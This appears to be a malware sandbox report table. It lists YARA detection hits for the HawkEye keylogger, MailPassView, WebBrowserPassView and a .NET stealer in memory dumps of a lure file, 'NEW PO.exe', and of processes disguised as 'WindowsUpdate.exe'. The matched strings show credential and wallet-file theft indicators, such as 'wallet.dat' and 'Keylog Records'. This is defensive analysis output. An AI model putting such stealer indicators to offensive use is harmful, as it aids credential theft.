7.0.NEW PO.exe.45fa72.14.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.7ee0000.49.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.45fa72.14.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.27.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.7ee0000.10.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
22.0.vbc.exe.400000.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.45fa72.12.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
16.0.WindowsUpdate.exe.45fa72.12.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.45fa72.12.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.45fa72.12.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
11.0.vbc.exe.400000.1.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.21.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
16.0.WindowsUpdate.exe.400000.21.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.400000.21.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.21.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.400000.21.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.21.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.409c0d.39.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
7.0.NEW PO.exe.409c0d.39.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.39.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.409c0d.39.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.39.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
18.2.WindowsUpdate.exe.42d9930.8.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.42d9930.8.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.27.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
7.0.NEW PO.exe.409c0d.27.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.27.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.409c0d.27.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.409c0d.27.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
7.2.NEW PO.exe.2af76d8.6.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.409c0d.22.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.409c0d.22.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.409c0d.22.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.409c0d.22.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.22.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.332d36c.31.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.2.NEW PO.exe.409c0d.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
7.2.NEW PO.exe.409c0d.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.2.NEW PO.exe.409c0d.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.2.NEW PO.exe.409c0d.2.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.409c0d.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.8640000.35.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.409c0d.12.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.6.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
16.0.WindowsUpdate.exe.400000.6.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.400000.6.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.6.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.400000.6.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.6.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.45fa72.23.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dbe7:$key: HawkEyeKeylogger 0x1fe65:$salt: 099u787978786 0x1e244:$string1: HawkEye_Keylogger 0x1f097:$string1: HawkEye_Keylogger 0x1fdc5:$string1: HawkEye_Keylogger 0x1e62d:$string2: holdermail.txt 0x1e64d:$string2: holdermail.txt 0x1e56f:$string3: wallet.dat 0x1e587:$string3: wallet.dat 0x1e59d:$string3: wallet.dat 0x1f989:$string4: Keylog Records 0x1fca1:$string4: Keylog Records 0x1febd:$string5: do not script --> 0x1dbcf:$string6: \pidloc.txt 0x1dc5d:$string7: BSPLIT 0x1dc6d:$string7: BSPLIT
18.0.WindowsUpdate.exe.45fa72.23.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.23.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.45fa72.23.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e29c:$hawkstr1: HawkEye Keylogger 0x1f0dd:$hawkstr1: HawkEye Keylogger 0x1f40c:$hawkstr1: HawkEye Keylogger 0x1f567:$hawkstr1: HawkEye Keylogger 0x1f6ca:$hawkstr1: HawkEye Keylogger 0x1f961:$hawkstr1: HawkEye Keylogger 0x1de0e:$hawkstr2: Dear HawkEye Customers! 0x1f45f:$hawkstr2: Dear HawkEye Customers! 0x1f5b6:$hawkstr2: Dear HawkEye Customers! 0x1f71d:$hawkstr2: Dear HawkEye Customers! 0x1df2f:$hawkstr3: HawkEye Logger Details:
23.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.409c0d.19.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.35e4248.43.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.0.WindowsUpdate.exe.409c0d.12.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
18.0.WindowsUpdate.exe.409c0d.12.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.409c0d.12.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.0.WindowsUpdate.exe.409c0d.12.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.0.WindowsUpdate.exe.409c0d.12.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.408208.23.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
16.0.WindowsUpdate.exe.408208.23.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.408208.23.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.408208.23.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.408208.23.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.408208.23.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
11.0.vbc.exe.400000.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.11.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.11.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.11.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.11.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.11.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.11.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.2.WindowsUpdate.exe.400000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
18.2.WindowsUpdate.exe.400000.0.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
18.2.WindowsUpdate.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.2.WindowsUpdate.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
18.2.WindowsUpdate.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.400000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
7.0.NEW PO.exe.409c0d.12.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
18.2.WindowsUpdate.exe.45fa72.3.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.45fa72.14.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.45fa72.23.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
18.0.WindowsUpdate.exe.8640000.47.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.6.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.6.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.6.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.6.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.6.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.6.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
16.2.WindowsUpdate.exe.400000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
